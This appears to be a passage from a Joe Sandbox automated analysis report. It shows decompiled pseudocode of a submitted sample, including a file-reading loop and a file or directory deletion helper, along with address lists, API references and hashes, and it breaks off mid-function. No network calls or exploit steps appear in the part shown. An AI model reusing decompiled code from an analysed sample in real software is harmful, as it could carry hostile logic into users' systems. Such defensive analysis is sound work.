                                                          								_t535 = _t534 | 0xffffffff;
                                                          								goto L172;
                                                          							}
                                                          						}
                                                          					}
                                                          				}
                                                          			}













                                                          0x00000000
                                                          0x00407068
                                                          0x00407068
                                                          0x0040706c
                                                          0x00407095
                                                          0x0040709f
                                                          0x0040706e
                                                          0x00407077
                                                          0x00407084
                                                          0x00407087
                                                          0x004073cb
                                                          0x004073cb
                                                          0x004073ce
                                                          0x004073ce
                                                          0x004073ce
                                                          0x004073d4
                                                          0x004073da
                                                          0x004073e0
                                                          0x004073fa
                                                          0x004073fd
                                                          0x00407403
                                                          0x0040740e
                                                          0x00407410
                                                          0x004073e2
                                                          0x004073e2
                                                          0x004073f1
                                                          0x004073f5
                                                          0x004073f5
                                                          0x0040741a
                                                          0x00000000
                                                          0x00000000
                                                          0x0040741c
                                                          0x00407420
                                                          0x004075cf
                                                          0x004075e5
                                                          0x004075ed
                                                          0x004075f4
                                                          0x004075f6
                                                          0x004075fd
                                                          0x00407601
                                                          0x00407601
                                                          0x0040742c
                                                          0x00407433
                                                          0x0040743b
                                                          0x0040743e
                                                          0x00407441
                                                          0x00407441
                                                          0x00407447
                                                          0x00407447
                                                          0x00406be3
                                                          0x00406be3
                                                          0x00406be3
                                                          0x00406bec
                                                          0x00000000
                                                          0x00000000
                                                          0x00406bf2
                                                          0x00000000
                                                          0x00406bfd
                                                          0x00000000
                                                          0x00000000
                                                          0x00406c06
                                                          0x00406c09
                                                          0x00406c0c
                                                          0x00406c10
                                                          0x00000000
                                                          0x00000000
                                                          0x00406c16
                                                          0x00406c19
                                                          0x00406c1b
                                                          0x00406c1c
                                                          0x00406c1f
                                                          0x00406c21
                                                          0x00406c22
                                                          0x00406c24
                                                          0x00406c27
                                                          0x00406c2c
                                                          0x00406c31
                                                          0x00406c3a
                                                          0x00406c4d
                                                          0x00406c50
                                                          0x00406c5c
                                                          0x00406c84
                                                          0x00406c86
                                                          0x00406c94
                                                          0x00406c94
                                                          0x00406c98
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x00406c88
                                                          0x00406c88
                                                          0x00406c8b
                                                          0x00406c8c
                                                          0x00406c8c
                                                          0x00000000
                                                          0x00406c88
                                                          0x00406c62
                                                          0x00406c67
                                                          0x00406c67
                                                          0x00406c70
                                                          0x00406c78
                                                          0x00406c7b
                                                          0x00000000
                                                          0x00406c81
                                                          0x00406c81
                                                          0x00000000
                                                          0x00406c81
                                                          0x00000000
                                                          0x00406c9e
                                                          0x00406c9e
                                                          0x00406ca2
                                                          0x0040754e
                                                          0x00000000
                                                          0x0040754e
                                                          0x00406cab
                                                          0x00406cbb
                                                          0x00406cbe
                                                          0x00406cc1
                                                          0x00406cc1
                                                          0x00406cc1
                                                          0x00406cc4
                                                          0x00406cc8
                                                          0x00000000
                                                          0x00000000
                                                          0x00406cca
                                                          0x00406cd0
                                                          0x00406cfa
                                                          0x00406d00
                                                          0x00406d07
                                                          0x00000000
                                                          0x00406d07
                                                          0x00406cd6
                                                          0x00406cd9
                                                          0x00406cde
                                                          0x00406cde
                                                          0x00406ce9
                                                          0x00406cf1
                                                          0x00406cf4
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x00406d39
                                                          0x00406d3f
                                                          0x00406d42
                                                          0x00406d4f
                                                          0x00406d57
                                                          0x004073cb
                                                          0x00000000
                                                          0x00000000
                                                          0x00406d0e
                                                          0x00406d0e
                                                          0x00406d12
                                                          0x0040755d
                                                          0x00000000
                                                          0x0040755d
                                                          0x00406d1e
                                                          0x00406d29
                                                          0x00406d29
                                                          0x00406d29
                                                          0x00406d2c
                                                          0x00406d2f
                                                          0x00406d32
                                                          0x00406d37
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x004073ce
                                                          0x004073ce
                                                          0x004073d4
                                                          0x004073da
                                                          0x004073e0
                                                          0x004073fa
                                                          0x004073fd
                                                          0x00407403
                                                          0x0040740e
                                                          0x00407410
                                                          0x004073e2
                                                          0x004073e2
                                                          0x004073f1
                                                          0x004073f5
                                                          0x004073f5
                                                          0x0040741a
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x00406d5f
                                                          0x00406d61
                                                          0x00406d64
                                                          0x00406dd5
                                                          0x00406dd8
                                                          0x00406ddb
                                                          0x00406de2
                                                          0x00406dec
                                                          0x004073cb
                                                          0x004073cb
                                                          0x00000000
                                                          0x004073cb
                                                          0x004073cb
                                                          0x00406d66
                                                          0x00406d6a
                                                          0x00406d6d
                                                          0x00406d6f
                                                          0x00406d72
                                                          0x00406d75
                                                          0x00406d77
                                                          0x00406d7a
                                                          0x00406d7c
                                                          0x00406d81
                                                          0x00406d84
                                                          0x00406d87
                                                          0x00406d8b
                                                          0x00406d92
                                                          0x00406d95
                                                          0x00406d9c
                                                          0x00406da0
                                                          0x00406da8
                                                          0x00406da8
                                                          0x00406da8
                                                          0x00406da2
                                                          0x00406da2
                                                          0x00406da2
                                                          0x00406d97
                                                          0x00406d97
                                                          0x00406d97
                                                          0x00406dac
                                                          0x00406daf
                                                          0x00406dcd
                                                          0x00406dcf
                                                          0x00000000
                                                          0x00406db1
                                                          0x00406db1
                                                          0x00406db4
                                                          0x00406db7
                                                          0x00406dba
                                                          0x00406dbc
                                                          0x00406dbc
                                                          0x00406dbc
                                                          0x00406dbf
                                                          0x00406dc2
                                                          0x00406dc4
                                                          0x00406dc5
                                                          0x00406dc8
                                                          0x00000000
                                                          0x00406dc8
                                                          0x00000000
                                                          0x00406ffe
                                                          0x00407002
                                                          0x00407020
                                                          0x00407023
                                                          0x0040702a
                                                          0x0040702d
                                                          0x00407030
                                                          0x00407033
                                                          0x00407036
                                                          0x00407039
                                                          0x0040703b
                                                          0x00407042
                                                          0x00407043
                                                          0x00407045
                                                          0x00407048
                                                          0x0040704b
                                                          0x0040704e
                                                          0x0040704e
                                                          0x00407053
                                                          0x00000000
                                                          0x00407053
                                                          0x00407004
                                                          0x00407007
                                                          0x0040700a
                                                          0x00407014
                                                          0x004073cb
                                                          0x004073cb
                                                          0x00000000
                                                          0x004073cb
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x004070ab
                                                          0x004070af
                                                          0x00000000
                                                          0x00000000
                                                          0x004070b5
                                                          0x004070b9
                                                          0x00000000
                                                          0x00000000
                                                          0x004070bf
                                                          0x004070c1
                                                          0x004070c5
                                                          0x004070c5
                                                          0x004070c8
                                                          0x004070cc
                                                          0x00000000
                                                          0x00000000
                                                          0x0040711c
                                                          0x00407120
                                                          0x00407127
                                                          0x0040712a
                                                          0x0040712d
                                                          0x00407137
                                                          0x004073cb
                                                          0x004073cb
                                                          0x00000000
                                                          0x004073cb
                                                          0x004073cb
                                                          0x00407122
                                                          0x00000000
                                                          0x00000000
                                                          0x00407143
                                                          0x00407147
                                                          0x0040714e
                                                          0x00407151
                                                          0x00407154
                                                          0x00407149
                                                          0x00407149
                                                          0x00407149
                                                          0x00407157
                                                          0x0040715a
                                                          0x0040715d
                                                          0x0040715d
                                                          0x00407160
                                                          0x00407163
                                                          0x00407166
                                                          0x00407166
                                                          0x00407169
                                                          0x00407170
                                                          0x00407175
                                                          0x00000000
                                                          0x00000000
                                                          0x00407203
                                                          0x00407203
                                                          0x00407207
                                                          0x004075a5
                                                          0x00000000
                                                          0x004075a5
                                                          0x0040720d
                                                          0x00407210
                                                          0x00407213
                                                          0x00407217
                                                          0x0040721a
                                                          0x00407220
                                                          0x00407222
                                                          0x00407222
                                                          0x00407222
                                                          0x00407225
                                                          0x00407228
                                                          0x00000000
                                                          0x00000000
                                                          0x00406df8
                                                          0x00406df8
                                                          0x00406dfc
                                                          0x00407569
                                                          0x00000000
                                                          0x00407569
                                                          0x00406e02
                                                          0x00406e05
                                                          0x00406e08
                                                          0x00406e0c
                                                          0x00406e0f
                                                          0x00406e15
                                                          0x00406e17
                                                          0x00406e17
                                                          0x00406e17
                                                          0x00406e1a
                                                          0x00406e1d
                                                          0x00406e1d
                                                          0x00406e20
                                                          0x00406e23
                                                          0x00000000
                                                          0x00000000
                                                          0x00406e29
                                                          0x00406e2f
                                                          0x00000000
                                                          0x00000000
                                                          0x00406e35
                                                          0x00406e35
                                                          0x00406e39
                                                          0x00406e3c
                                                          0x00406e3f
                                                          0x00406e42
                                                          0x00406e45
                                                          0x00406e46
                                                          0x00406e49
                                                          0x00406e4b
                                                          0x00406e51
                                                          0x00406e54
                                                          0x00406e57
                                                          0x00406e5a
                                                          0x00406e5d
                                                          0x00406e60
                                                          0x00406e63
                                                          0x00406e7f
                                                          0x00406e82
                                                          0x00406e85
                                                          0x00406e88
                                                          0x00406e8f
                                                          0x00406e93
                                                          0x00406e95
                                                          0x00406e99
                                                          0x00406e65
                                                          0x00406e65
                                                          0x00406e69
                                                          0x00406e71
                                                          0x00406e76
                                                          0x00406e78
                                                          0x00406e7a
                                                          0x00406e7a
                                                          0x00406e9c
                                                          0x00406ea3
                                                          0x00406ea6
                                                          0x00000000
                                                          0x00406eac
                                                          0x00000000
                                                          0x00406eac
                                                          0x00000000
                                                          0x00406eb1
                                                          0x00406eb1
                                                          0x00406eb5
                                                          0x00407575
                                                          0x00000000
                                                          0x00407575
                                                          0x00406ebb
                                                          0x00406ebe
                                                          0x00406ec1
                                                          0x00406ec5
                                                          0x00406ec8
                                                          0x00406ece
                                                          0x00406ed0
                                                          0x00406ed0
                                                          0x00406ed0
                                                          0x00406ed3
                                                          0x00406ed6
                                                          0x00406ed6
                                                          0x00406ed6
                                                          0x00406edc
                                                          0x00000000
                                                          0x00000000
                                                          0x00406ede
                                                          0x00406ee1
                                                          0x00406ee4
                                                          0x00406ee7
                                                          0x00406eea
                                                          0x00406eed
                                                          0x00406ef0
                                                          0x00406ef3
                                                          0x00406ef6
                                                          0x00406ef9
                                                          0x00406efc
                                                          0x00406f14
                                                          0x00406f17
                                                          0x00406f1a
                                                          0x00406f1d
                                                          0x00406f1d
                                                          0x00406f20
                                                          0x00406f24
                                                          0x00406f26
                                                          0x00406efe
                                                          0x00406efe
                                                          0x00406f06
                                                          0x00406f0b
                                                          0x00406f0d
                                                          0x00406f0f
                                                          0x00406f0f
                                                          0x00406f29
                                                          0x00406f30
                                                          0x00406f33
                                                          0x00000000
                                                          0x00406f35
                                                          0x00000000
                                                          0x00406f35
                                                          0x00406f33
                                                          0x00406f3a
                                                          0x00406f3a
                                                          0x00406f3a
                                                          0x00406f3a
                                                          0x00000000
                                                          0x00000000
                                                          0x00406f75
                                                          0x00406f75
                                                          0x00406f79
                                                          0x00407581
                                                          0x00000000
                                                          0x00407581
                                                          0x00406f7f
                                                          0x00406f82
                                                          0x00406f85
                                                          0x00406f89
                                                          0x00406f8c
                                                          0x00406f92
                                                          0x00406f94
                                                          0x00406f94
                                                          0x00406f94
                                                          0x00406f97
                                                          0x00406f9a
                                                          0x00406f9a
                                                          0x00406fa0
                                                          0x00406f3e
                                                          0x00406f3e
                                                          0x00406f41
                                                          0x00000000
                                                          0x00406f41
                                                          0x00406fa2
                                                          0x00406fa2
                                                          0x00406fa5
                                                          0x00406fa8
                                                          0x00406fab
                                                          0x00406fae
                                                          0x00406fb1
                                                          0x00406fb4
                                                          0x00406fb7
                                                          0x00406fba
                                                          0x00406fbd
                                                          0x00406fc0
                                                          0x00406fd8
                                                          0x00406fdb
                                                          0x00406fde
                                                          0x00406fe1
                                                          0x00406fe1
                                                          0x00406fe4
                                                          0x00406fe8
                                                          0x00406fea
                                                          0x00406fc2
                                                          0x00406fc2
                                                          0x00406fca
                                                          0x00406fcf
                                                          0x00406fd1
                                                          0x00406fd3
                                                          0x00406fd3
                                                          0x00406fed
                                                          0x00406ff4
                                                          0x00406ff7
                                                          0x00000000
                                                          0x00406ff9
                                                          0x00000000
                                                          0x00406ff9
                                                          0x00000000
                                                          0x00407286
                                                          0x00407286
                                                          0x0040728a
                                                          0x004075b1
                                                          0x00000000
                                                          0x004075b1
                                                          0x00407290
                                                          0x00407293
                                                          0x00407296
                                                          0x0040729a
                                                          0x0040729d
                                                          0x004072a3
                                                          0x004072a5
                                                          0x004072a5
                                                          0x004072a5
                                                          0x004072a8
                                                          0x00000000
                                                          0x00000000
                                                          0x00407056
                                                          0x00407056
                                                          0x00407059
                                                          0x004073cb
                                                          0x004073cb
                                                          0x00000000
                                                          0x004073cb
                                                          0x00000000
                                                          0x00407395
                                                          0x00407399
                                                          0x004073bb
                                                          0x004073be
                                                          0x004073c8
                                                          0x004073cb
                                                          0x004073cb
                                                          0x00000000
                                                          0x004073cb
                                                          0x004073cb
                                                          0x0040739b
                                                          0x0040739e
                                                          0x004073a2
                                                          0x004073a5
                                                          0x004073a5
                                                          0x004073a8
                                                          0x00000000
                                                          0x00000000
                                                          0x00407452
                                                          0x00407456
                                                          0x00407474
                                                          0x00407474
                                                          0x00407474
                                                          0x0040747b
                                                          0x00407482
                                                          0x00407489
                                                          0x00407489
                                                          0x00000000
                                                          0x00407489
                                                          0x00407458
                                                          0x0040745b
                                                          0x0040745e
                                                          0x00407461
                                                          0x00407468
                                                          0x004073ac
                                                          0x004073ac
                                                          0x004073af
                                                          0x00000000
                                                          0x00000000
                                                          0x00407543
                                                          0x00407546
                                                          0x00407447
                                                          0x00000000
                                                          0x00000000
                                                          0x0040717d
                                                          0x0040717f
                                                          0x00407186
                                                          0x00407187
                                                          0x00407189
                                                          0x0040718c
                                                          0x00000000
                                                          0x00000000
                                                          0x00407194
                                                          0x00407197
                                                          0x0040719a
                                                          0x0040719c
                                                          0x0040719e
                                                          0x0040719e
                                                          0x0040719f
                                                          0x004071a2
                                                          0x004071a9
                                                          0x004071ac
                                                          0x004071ba
                                                          0x00000000
                                                          0x00000000
                                                          0x00407490
                                                          0x00407490
                                                          0x00407493
                                                          0x0040749a
                                                          0x00000000
                                                          0x00000000
                                                          0x0040749f
                                                          0x0040749f
                                                          0x004074a3
                                                          0x004075db
                                                          0x00000000
                                                          0x004075db
                                                          0x004074a9
                                                          0x004074ac
                                                          0x004074af
                                                          0x004074b3
                                                          0x004074b6
                                                          0x004074bc
                                                          0x004074be
                                                          0x004074be
                                                          0x004074be
                                                          0x004074c1
                                                          0x004074c4
                                                          0x004074c4
                                                          0x004074c4
                                                          0x004074c4
                                                          0x004074c7
                                                          0x004074c7
                                                          0x004074cb
                                                          0x0040752b
                                                          0x0040752e
                                                          0x00407533
                                                          0x00407534
                                                          0x00407536
                                                          0x00407538
                                                          0x0040753b
                                                          0x00407447
                                                          0x00407447
                                                          0x00000000
                                                          0x0040744d
                                                          0x00407447
                                                          0x004074cd
                                                          0x004074d3
                                                          0x004074d6
                                                          0x004074d9
                                                          0x004074dc
                                                          0x004074df
                                                          0x004074e2
                                                          0x004074e5
                                                          0x004074e8
                                                          0x004074eb
                                                          0x004074ee
                                                          0x00407507
                                                          0x0040750a
                                                          0x0040750d
                                                          0x00407510
                                                          0x00407514
                                                          0x00407516
                                                          0x00407516
                                                          0x00407517
                                                          0x0040751a
                                                          0x004074f0
                                                          0x004074f0
                                                          0x004074f8
                                                          0x004074fd
                                                          0x004074ff
                                                          0x00407502
                                                          0x00407502
                                                          0x0040751d
                                                          0x00407524
                                                          0x00000000
                                                          0x00407526
                                                          0x00000000
                                                          0x00407526
                                                          0x00000000
                                                          0x004071c2
                                                          0x004071c5
                                                          0x004071fb
                                                          0x0040732b
                                                          0x0040732b
                                                          0x0040732b
                                                          0x0040732b
                                                          0x0040732e
                                                          0x0040732e
                                                          0x00407331
                                                          0x00407333
                                                          0x004075bd
                                                          0x00000000
                                                          0x004075bd
                                                          0x00407339
                                                          0x0040733c
                                                          0x00000000
                                                          0x00000000
                                                          0x00407342
                                                          0x00407346
                                                          0x00407349
                                                          0x00407349
                                                          0x00407349
                                                          0x00000000
                                                          0x00407349
                                                          0x004071c7
                                                          0x004071c9
                                                          0x004071cb
                                                          0x004071cd
                                                          0x004071d0
                                                          0x004071d1
                                                          0x004071d3
                                                          0x004071d5
                                                          0x004071d8
                                                          0x004071db
                                                          0x004071f1
                                                          0x004071f6
                                                          0x0040722e
                                                          0x0040722e
                                                          0x00407232
                                                          0x0040725e
                                                          0x00407260
                                                          0x00407267
                                                          0x0040726a
                                                          0x0040726d
                                                          0x0040726d
                                                          0x00407272
                                                          0x00407272
                                                          0x00407274
                                                          0x00407277
                                                          0x0040727e
                                                          0x00407281
                                                          0x004072ae
                                                          0x004072ae
                                                          0x004072b1
                                                          0x004072b4
                                                          0x00407328
                                                          0x00407328
                                                          0x00407328
                                                          0x00000000
                                                          0x00407328
                                                          0x004072b6
                                                          0x004072bc
                                                          0x004072bf
                                                          0x004072c2
                                                          0x004072c5
                                                          0x004072c8
                                                          0x004072cb
                                                          0x004072ce
                                                          0x004072d1
                                                          0x004072d4
                                                          0x004072d7
                                                          0x004072f0
                                                          0x004072f2
                                                          0x004072f5
                                                          0x004072f6
                                                          0x004072f9
                                                          0x004072fb
                                                          0x004072fe
                                                          0x00407300
                                                          0x00407302
                                                          0x00407305
                                                          0x00407307
                                                          0x0040730a
                                                          0x0040730e
                                                          0x00407310
                                                          0x00407310
                                                          0x00407311
                                                          0x00407314
                                                          0x00407317
                                                          0x004072d9
                                                          0x004072d9
                                                          0x004072e1
                                                          0x004072e6
                                                          0x004072e8
                                                          0x004072eb
                                                          0x004072eb
                                                          0x0040731a
                                                          0x00407321
                                                          0x004072ab
                                                          0x004072ab
                                                          0x004072ab
                                                          0x004072ab
                                                          0x00000000
                                                          0x00407323
                                                          0x00000000
                                                          0x00407323
                                                          0x00407321
                                                          0x00407234
                                                          0x00407237
                                                          0x00407239
                                                          0x0040723c
                                                          0x0040723f
                                                          0x00407242
                                                          0x00407244
                                                          0x00407247
                                                          0x0040724a
                                                          0x0040724a
                                                          0x0040724d
                                                          0x0040724d
                                                          0x00407250
                                                          0x00407257
                                                          0x0040722b
                                                          0x0040722b
                                                          0x0040722b
                                                          0x0040722b
                                                          0x00000000
                                                          0x00407259
                                                          0x00000000
                                                          0x00407259
                                                          0x00407257
                                                          0x004071dd
                                                          0x004071e0
                                                          0x004071e2
                                                          0x004071e5
                                                          0x00000000
                                                          0x00000000
                                                          0x00406f44
                                                          0x00406f44
                                                          0x00406f48
                                                          0x0040758d
                                                          0x00000000
                                                          0x0040758d
                                                          0x00406f4e
                                                          0x00406f51
                                                          0x00406f54
                                                          0x00406f57
                                                          0x00406f5a
                                                          0x00406f5d
                                                          0x00406f60
                                                          0x00406f62
                                                          0x00406f65
                                                          0x00406f68
                                                          0x00406f6b
                                                          0x00406f6d
                                                          0x00406f6d
                                                          0x00406f6d
                                                          0x00000000
                                                          0x00000000
                                                          0x004070cf
                                                          0x004070cf
                                                          0x004070d3
                                                          0x00407599
                                                          0x00000000
                                                          0x00407599
                                                          0x004070d9
                                                          0x004070dc
                                                          0x004070df
                                                          0x004070e2
                                                          0x004070e4
                                                          0x004070e4
                                                          0x004070e4
                                                          0x004070e7
                                                          0x004070ea
                                                          0x004070ed
                                                          0x004070f0
                                                          0x004070f3
                                                          0x004070f6
                                                          0x004070f7
                                                          0x004070f9
                                                          0x004070f9
                                                          0x004070f9
                                                          0x004070fc
                                                          0x004070ff
                                                          0x00407102
                                                          0x00407105
                                                          0x00407105
                                                          0x00407105
                                                          0x00407108
                                                          0x0040710a
                                                          0x0040710a
                                                          0x00000000
                                                          0x00000000
                                                          0x0040734c
                                                          0x0040734c
                                                          0x0040734c
                                                          0x00407350
                                                          0x00000000
                                                          0x00000000
                                                          0x00407356
                                                          0x00407359
                                                          0x0040735c
                                                          0x0040735f
                                                          0x00407361
                                                          0x00407361
                                                          0x00407361
                                                          0x00407364
                                                          0x00407367
                                                          0x0040736a
                                                          0x0040736d
                                                          0x00407370
                                                          0x00407373
                                                          0x00407374
                                                          0x00407376
                                                          0x00407376
                                                          0x00407376
                                                          0x00407379
                                                          0x0040737c
                                                          0x0040737f
                                                          0x00407382
                                                          0x00407385
                                                          0x00407389
                                                          0x0040738b
                                                          0x0040738e
                                                          0x00000000
                                                          0x00407390
                                                          0x0040710d
                                                          0x0040710d
                                                          0x00000000
                                                          0x0040710d
                                                          0x0040738e
                                                          0x004075c3
                                                          0x00000000
                                                          0x00000000
                                                          0x00406bf2
                                                          0x004075fa
                                                          0x004075fa
                                                          0x00000000
                                                          0x004075fa
                                                          0x00407447
                                                          0x004073ce
                                                          0x004073cb

                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.292638866.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.292633849.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.292664060.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.292695326.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.292705832.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.292767334.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.292786938.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.292798492.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.292806668.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.292812000.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_xeWd55M5Lb.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: b33066b9a67caffcdb2859c2a3d237c195f810e8b6f417b46283b98aba377de3
                                                          • Instruction ID: 947ff9f4813c08031b822263453b6bbc7859602ae013fffc9a74d3363ad91bbb
                                                          • Opcode Fuzzy Hash: b33066b9a67caffcdb2859c2a3d237c195f810e8b6f417b46283b98aba377de3
                                                          • Instruction Fuzzy Hash: FE713471E04228DBEF28CF98C8547ADBBB1FF44305F15806AD856BB281C778A986DF45
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          C-Code - Quality: 93%
                                                          			E00403479(intOrPtr _a4) {
                                                          				intOrPtr _t11;
                                                          				signed int _t12;
                                                          				void* _t14;
                                                          				void* _t15;
                                                          				long _t16;
                                                          				void* _t18;
                                                          				intOrPtr _t31;
                                                          				intOrPtr _t34;
                                                          				intOrPtr _t36;
                                                          				void* _t37;
                                                          				intOrPtr _t49;
                                                          
                                                          				_t34 =  *0x420ef4 -  *0x40ce60 + _a4;
                                                          				 *0x42a26c = GetTickCount() + 0x1f4;
                                                          				if(_t34 <= 0) {
                                                          					L22:
                                                          					E0040302E(1);
                                                          					return 0;
                                                          				}
                                                          				E004035F8( *0x420f04);
                                                          				SetFilePointer( *0x40a01c,  *0x40ce60, 0, 0); // executed
                                                          				 *0x420f00 = _t34;
                                                          				 *0x420ef0 = 0;
                                                          				while(1) {
                                                          					_t31 = 0x4000;
                                                          					_t11 =  *0x420ef8 -  *0x420f04;
                                                          					if(_t11 <= 0x4000) {
                                                          						_t31 = _t11;
                                                          					}
                                                          					_t12 = E004035E2(0x414ef0, _t31);
                                                          					if(_t12 == 0) {
                                                          						break;
                                                          					}
                                                          					 *0x420f04 =  *0x420f04 + _t31;
                                                          					 *0x40ce80 = 0x414ef0;
                                                          					 *0x40ce84 = _t31;
                                                          					L6:
                                                          					L6:
                                                          					if( *0x42a270 != 0 &&  *0x42a300 == 0) {
                                                          						 *0x420ef0 =  *0x420f00 -  *0x420ef4 - _a4 +  *0x40ce60;
                                                          						E0040302E(0);
                                                          					}
                                                          					 *0x40ce88 = 0x40cef0;
                                                          					 *0x40ce8c = 0x8000; // executed
                                                          					_t14 = E00406BB0(0x40ce68); // executed
                                                          					if(_t14 < 0) {
                                                          						goto L20;
                                                          					}
                                                          					_t36 =  *0x40ce88; // 0x40dbf9
                                                          					_t37 = _t36 - 0x40cef0;
                                                          					if(_t37 == 0) {
                                                          						__eflags =  *0x40ce84; // 0x0
                                                          						if(__eflags != 0) {
                                                          							goto L20;
                                                          						}
                                                          						__eflags = _t31;
                                                          						if(_t31 == 0) {
                                                          							goto L20;
                                                          						}
                                                          						L16:
                                                          						_t16 =  *0x420ef4;
                                                          						if(_t16 -  *0x40ce60 + _a4 > 0) {
                                                          							continue;
                                                          						}
                                                          						SetFilePointer( *0x40a01c, _t16, 0, 0); // executed
                                                          						goto L22;
                                                          					}
                                                          					_t18 = E0040620A( *0x40a01c, 0x40cef0, _t37); // executed
                                                          					if(_t18 == 0) {
                                                          						_push(0xfffffffe);
                                                          						L21:
                                                          						_pop(_t15);
                                                          						return _t15;
                                                          					}
                                                          					 *0x40ce60 =  *0x40ce60 + _t37;
                                                          					_t49 =  *0x40ce84; // 0x0
                                                          					if(_t49 != 0) {
                                                          						goto L6;
                                                          					}
                                                          					goto L16;
                                                          					L20:
                                                          					_push(0xfffffffd);
                                                          					goto L21;
                                                          				}
                                                          				return _t12 | 0xffffffff;
                                                          			}














                                                          0x00403489
                                                          0x0040349c
                                                          0x004034a1
                                                          0x004035d1
                                                          0x004035d3
                                                          0x00000000
                                                          0x004035d9
                                                          0x004034ad
                                                          0x004034c0
                                                          0x004034c6
                                                          0x004034cc
                                                          0x004034d7
                                                          0x004034dc
                                                          0x004034e1
                                                          0x004034e9
                                                          0x004034eb
                                                          0x004034eb
                                                          0x004034f4
                                                          0x004034fb
                                                          0x00000000
                                                          0x00000000
                                                          0x00403501
                                                          0x00403507
                                                          0x0040350d
                                                          0x00000000
                                                          0x00403513
                                                          0x00403519
                                                          0x00403539
                                                          0x0040353e
                                                          0x00403543
                                                          0x00403549
                                                          0x0040354f
                                                          0x00403559
                                                          0x00403560
                                                          0x00000000
                                                          0x00000000
                                                          0x00403562
                                                          0x00403568
                                                          0x0040356a
                                                          0x0040358d
                                                          0x00403593
                                                          0x00000000
                                                          0x00000000
                                                          0x00403595
                                                          0x00403597
                                                          0x00000000
                                                          0x00000000
                                                          0x00403599
                                                          0x00403599
                                                          0x004035ac
                                                          0x00000000
                                                          0x00000000
                                                          0x004035bb
                                                          0x00000000
                                                          0x004035bb
                                                          0x00403574
                                                          0x0040357b
                                                          0x004035c8
                                                          0x004035ce
                                                          0x004035ce
                                                          0x00000000
                                                          0x004035ce
                                                          0x0040357d
                                                          0x00403583
                                                          0x00403589
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x004035cc
                                                          0x004035cc
                                                          0x00000000
                                                          0x004035cc
                                                          0x00000000

                                                          APIs
                                                          • GetTickCount.KERNEL32 ref: 0040348D
                                                            • Part of subcall function 004035F8: SetFilePointer.KERNELBASE(00000000,00000000,00000000,004032F6,?), ref: 00403606
                                                          • SetFilePointer.KERNELBASE(00000000,00000000,?,00000000,004033A3,00000004,00000000,00000000,?,?,0040331D,000000FF,00000000,00000000,?,?), ref: 004034C0
                                                          • SetFilePointer.KERNELBASE(?,00000000,00000000,00414EF0,00004000,?,00000000,004033A3,00000004,00000000,00000000,?,?,0040331D,000000FF,00000000), ref: 004035BB
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.292638866.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.292633849.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.292664060.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.292695326.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.292705832.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.292767334.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.292786938.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.292798492.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.292806668.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.292812000.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_xeWd55M5Lb.jbxd
                                                          Similarity
                                                          • API ID: FilePointer$CountTick
                                                          • String ID:
                                                          • API String ID: 1092082344-0
                                                          • Opcode ID: 3ac154d52ea9800dffc85ef1316eb03f3be91f57b238af8bcd161a90f23d8065
                                                          • Instruction ID: 4a0f782daef8a724a5dada35133bb9654e3c612a62d69fcdf17392b9264be50a
                                                          • Opcode Fuzzy Hash: 3ac154d52ea9800dffc85ef1316eb03f3be91f57b238af8bcd161a90f23d8065
                                                          • Instruction Fuzzy Hash: 3A31AEB2650205EFC7209F29EE848263BADF70475A755023BE900B22F1C7B59D42DB9D
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          C-Code - Quality: 41%
                                                          			E00405D2C(void* __eflags, WCHAR* _a4, signed int _a8) {
                                                          				int _t9;
                                                          				long _t13;
                                                          				WCHAR* _t14;
                                                          
                                                          				_t14 = _a4;
                                                          				_t13 = E00406133(_t14);
                                                          				if(_t13 == 0xffffffff) {
                                                          					L8:
                                                          					return 0;
                                                          				}
                                                          				_push(_t14);
                                                          				if((_a8 & 0x00000001) == 0) {
                                                          					_t9 = DeleteFileW();
                                                          				} else {
                                                          					_t9 = RemoveDirectoryW(); // executed
